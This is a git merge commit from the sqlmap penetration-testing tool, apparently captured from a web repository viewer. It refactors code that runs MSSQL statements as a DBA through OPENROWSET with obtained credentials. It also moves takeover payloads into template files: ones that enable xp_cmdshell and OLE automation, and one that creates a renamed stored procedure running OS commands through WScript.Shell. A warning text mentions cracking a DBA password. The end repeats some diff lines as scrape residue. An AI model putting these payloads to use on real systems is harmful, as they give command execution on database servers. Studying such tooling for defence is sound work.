Merge branch 'master' of github.com:sqlmapproject/sqlmap

2025-02-03 21:24:13 +03:00 · 2012-07-03 00:50:45 +02:00 · 2012-07-03 00:50:45 +02:00 · 5af6ca58a0
commit 5af6ca58a0
parent 168aeadf76 1bae9955b7
10 changed files with 52 additions and 41 deletions
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@ -11,6 +11,7 @@ from xml.etree import ElementTree as ET
 from lib.core.common import Backend
 from lib.core.common import extractRegexResult
 from lib.core.common import getSPQLSnippet
 from lib.core.common import isDBMSVersionAtLeast
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import randomInt
@ -27,6 +28,7 @@ from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import FROM_DUMMY_TABLE
 from lib.core.settings import GENERIC_SQL_COMMENT
 from lib.core.settings import PAYLOAD_DELIMITER
 from lib.core.settings import SQL_STATEMENTS
 from lib.core.unescaper import unescaper
 class Agent:
@ -816,5 +818,20 @@ class Agent:
        return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), "%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER), inpStr) if inpStr else inpStr
    def runAsDBMSUser(self, query):
        if conf.dCred and "Ad Hoc Distributed Queries" not in query:
            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
                for sqlStatement in sqlStatements:
                    if query.lower().startswith(sqlStatement):
                        sqlType = sqlTitle
                        break
            if sqlType and "SELECT" not in sqlType:
                query = "SELECT %d;%s" % (randomInt(), query)
            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
        return query
 # SQL agent
 agent = Agent()
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@ -16,7 +16,6 @@ from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import PAYLOAD
 from lib.core.exception import sqlmapUnsupportedFeatureException
 from lib.core.settings import SQL_STATEMENTS
 from lib.core.shell import autoCompletion
 from lib.request import inject
 from lib.takeover.udf import UDF
@ -38,21 +37,6 @@ class Abstraction(Web, UDF, xp_cmdshell):
        Web.__init__(self)
        xp_cmdshell.__init__(self)
    def runAsDBMSUser(self, query):
        if conf.dCred:
            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
                for sqlStatement in sqlStatements:
                    if query.lower().startswith(sqlStatement):
                        sqlType = sqlTitle
                        break
            if sqlType and "SELECT" not in sqlType:
                query = "SELECT 1;%s" % query
            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
        return query
    def execCmd(self, cmd, silent=False):
        if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
            self.webBackdoorRunCmd(cmd)
@ -201,6 +185,13 @@ class Abstraction(Web, UDF, xp_cmdshell):
            if mandatory and not self.isDba():
                warnMsg = "the functionality requested might not work because "
                warnMsg += "the session user is not a database administrator"
                if not conf.dCred and Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.PGSQL ):
                    warnMsg += ". You can try to provide --dbms-cred switch "
                    warnMsg += "to execute statements as a DBA user if you "
                    warnMsg += "were able to extract and crack a DBA "
                    warnMsg += "password by any mean"
                logger.warn(warnMsg)
            if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -5,6 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 from lib.core.agent import agent
 from lib.core.common import Backend
 from lib.core.common import getSPQLSnippet
 from lib.core.common import hashDBWrite
@ -40,26 +41,19 @@ class xp_cmdshell:
        if Backend.isVersionWithin(("2005", "2008")):
            logger.debug("activating sp_OACreate")
-            cmd += "EXEC master..sp_configure 'show advanced options', 1; "
+            cmd = getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
-            cmd += "RECONFIGURE WITH OVERRIDE; "
+            inject.goStacked(agent.runAsDBMSUser(cmd))
            cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
            cmd += "RECONFIGURE WITH OVERRIDE; "
            inject.goStacked(cmd)
        self.__randStr = randomStr(lowercase=True)
        self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
        self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew
-        cmd += "DECLARE @%s nvarchar(999); " % self.__randStr
+        cmd = getSPQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew)
        cmd += "set @%s='" % self.__randStr
        cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "
        cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "
        cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "
        cmd += "EXEC sp_OADestroy @ID'; "
        cmd += "EXEC master..sp_executesql @%s;" % self.__randStr
        if Backend.isVersionWithin(("2005", "2008")):
-            cmd += " RECONFIGURE WITH OVERRIDE;"
+            cmd += ";RECONFIGURE WITH OVERRIDE"
-        inject.goStacked(cmd)
+        inject.goStacked(agent.runAsDBMSUser(cmd))
    def __xpCmdshellConfigure2005(self, mode):
        debugMsg = "configuring xp_cmdshell using sp_configure "
@ -76,10 +70,9 @@ class xp_cmdshell:
        logger.debug(debugMsg)
        if mode == 1:
-            cmd = "EXEC master..sp_addextendedproc 'xp_cmdshell', "
+            cmd = getSPQLSnippet(DBMS.MSSQL, "enable_xp_cmdshell_2000", ENABLE=str(mode))
            cmd += "@dllname='xplog70.dll'"
        else:
-            cmd = "EXEC master..sp_dropextendedproc 'xp_cmdshell'"
+            cmd = getSPQLSnippet(DBMS.MSSQL, "disable_xp_cmdshell_2000", ENABLE=str(mode))
        return cmd
@ -89,7 +82,7 @@ class xp_cmdshell:
        else:
            cmd = self.__xpCmdshellConfigure2000(mode)
-        inject.goStacked(cmd)
+        inject.goStacked(agent.runAsDBMSUser(cmd))
    def __xpCmdshellCheck(self):
        cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2)
@ -154,7 +147,7 @@ class xp_cmdshell:
        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
-        return self.runAsDBMSUser(self.__forgedCmd)
+        return agent.runAsDBMSUser(self.__forgedCmd)
    def xpCmdshellExecCmd(self, cmd, silent=False):
        cmd = self.xpCmdshellForgeCmd(cmd)
--- a/procs/mssqlserver/activate_sp_oacreate.txt
+++ b/procs/mssqlserver/activate_sp_oacreate.txt
@ -0,0 +1,4 @@
 EXEC master..sp_configure 'show advanced options',1;
 RECONFIGURE WITH OVERRIDE;
 EXEC master..sp_configure 'ole automation procedures',1;
 RECONFIGURE WITH OVERRIDE
--- a/procs/mssqlserver/configure_openrowset.txt
+++ b/procs/mssqlserver/configure_openrowset.txt
@ -3,4 +3,4 @@ RECONFIGURE WITH OVERRIDE;
 EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
 RECONFIGURE WITH OVERRIDE;
 EXEC sp_configure 'show advanced options', 0;
-RECONFIGURE WITH OVERRIDE;
+RECONFIGURE WITH OVERRIDE
--- a/procs/mssqlserver/configure_xp_cmdshell.txt
+++ b/procs/mssqlserver/configure_xp_cmdshell.txt
@ -1,6 +1,6 @@
-EXEC master..sp_configure 'show advanced options', 1;
+EXEC master..sp_configure 'show advanced options',1;
 RECONFIGURE WITH OVERRIDE;
-EXEC master..sp_configure 'xp_cmdshell', %ENABLE%;
+EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
 RECONFIGURE WITH OVERRIDE;
 EXEC sp_configure 'show advanced options', 0;
 RECONFIGURE WITH OVERRIDE;
 EXEC sp_configure 'show advanced options',0;
 RECONFIGURE WITH OVERRIDE
--- a/procs/mssqlserver/create_new_xp_cmdshell.txt
+++ b/procs/mssqlserver/create_new_xp_cmdshell.txt
@ -0,0 +1,3 @@
 DECLARE @%RANDSTR% nvarchar(999);
 set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
 EXEC master..sp_executesql @%RANDSTR%
--- a/procs/mssqlserver/disable_xp_cmdshell_2000.txt
+++ b/procs/mssqlserver/disable_xp_cmdshell_2000.txt
@ -0,0 +1 @@
 EXEC master..sp_dropextendedproc 'xp_cmdshell'
--- a/procs/mssqlserver/enable_xp_cmdshell_2000.txt
+++ b/procs/mssqlserver/enable_xp_cmdshell_2000.txt
@ -0,0 +1 @@
 EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'
--- a/procs/mssqlserver/run_statement_as_user.txt
+++ b/procs/mssqlserver/run_statement_as_user.txt
@ -1 +1,2 @@
-SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%');
+SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')
 # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')
		`@ -0,0 +1 @@`
							`EXEC master..sp_dropextendedproc 'xp_cmdshell'`
		`@ -0,0 +1 @@`
							`EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'`
`@ -1 +1,2 @@`
	`SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%');`	`SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')`
		`# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')`